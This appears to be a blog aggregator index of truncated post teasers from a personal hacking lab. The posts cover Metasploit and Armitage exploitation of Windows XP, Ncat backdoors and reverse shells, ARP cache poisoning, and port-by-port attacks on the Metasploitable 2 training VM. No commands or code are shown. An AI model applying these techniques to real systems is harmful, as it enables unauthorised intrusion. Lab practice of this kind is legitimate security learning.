Clik here to view.
Metasploit: My First Successful Armitage Exploit
I just completed my first successful exploit in the marvellous Metasploit GUI Armitage. Details of the target machine on my Virtual Hacking Lab: Windows XP Pro Service Pack 2 (unpatched). Firewall and...
View ArticleClik here to view.
Seting up a simple backdoor shell using Ncat via Metasploit Armitage
First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post. Then I needed to upload the ncat.exe file (which I download from here) to the target...
View ArticleClik here to view.
Creating a persistent Ncap backdoor in Windows XP startup using Metasploit
I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal. I exploited the XP system as per this post and obtained an Meterpreter shell. First to upload the...
View ArticleNcat Reverse Shell (Shell Shovelling)
This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool. Previous...
View ArticleClik here to view.
Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning
My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP...
View ArticleRuby PacketFu: ARP Packet Spoofing and Cache Poisoning Infinite Looping Every...
Following on from my last post on ARP Packet Spoofing and Cache Poisoning using PacketFu, Adam advised me: Just a helpful tip the ARP address entry will revert back to the original. ARP requests are...
View ArticleMetasploitable 2: Port 23 Open Telnet
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 23/tcp open telnet Linux telnetd Most of the information on the Internet talks of using a password cracking tool...
View ArticleMetasploitable 2: Port 25 Open SMTP Postfix SMTPD
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd Despite researching the Postfix email service, I haven’t uncovered an exploit;...
View ArticleMetasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.4.2 It’s worth noting at the outset that neither of the below Metaploit...
View ArticleMetasploitable 2: Apache killer DOS
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) The Nessus scan had this to say regarding port 80: 55976...
View ArticleMetasploitable 2: RPC (Remote Procedure Call) Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 111/tcp open rpcbind 2 (RPC #100000) The SANS Institute has this to say about rcpbind and Portmapper: What is...
View ArticleMetasploitable 2: Samba Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup:...
View ArticleMetasploitable 2: Remote Access Ports 512, 513 & 514
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 512/tcp open exec? 513/tcp open login 514/tcp open tcpwrapped All of these ports are running “r” services. These...
View ArticleMetasploitable 2: Java RMI (Remote Method Invocation) Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 1099/tcp open rmiregistry GNU Classpath grmiregistry From Wiki: The Java Remote Method Invocation (Java RMI) is a Java...
View ArticleMetasploitable 2: Port 1524 ingreslock Backdoor
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 1524/tcp open ingreslock? Ingreslock was popular for adding a backdoor on to a compromised server. The Nessus report...
View ArticleMetasploitable 2: Port 2121 – ProFTPD 1.3.1
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 2121/tcp open ftp ProFTPD 1.3.1 The Nessus report on Port 2121 had this to say: 2121/tcp FTP Supports Clear...
View ArticleMetasploitable 2: Port 3306 MySQL
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 The Nessus report on this port was very revealing; here is some of the...
View ArticleMetasploitable 2: Port 3632 distccd Exploit and Privilege Escalation
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 3632/tcp open distccd? What is distccd? Distcc is a program to distribute builds of C, C++, Objective C or Objective...
View ArticleMetasploitable 2: Port 5432 – PostgreSQL
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7 This exploit is straight forward brute force using Metasploit:...
View ArticleClik here to view.
Metasploitable 2: Port 5900 – VNC
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 5900/tcp open vnc VNC (protocol 3.3) The information online pertaining to exploiting this VNC service all use...
View Article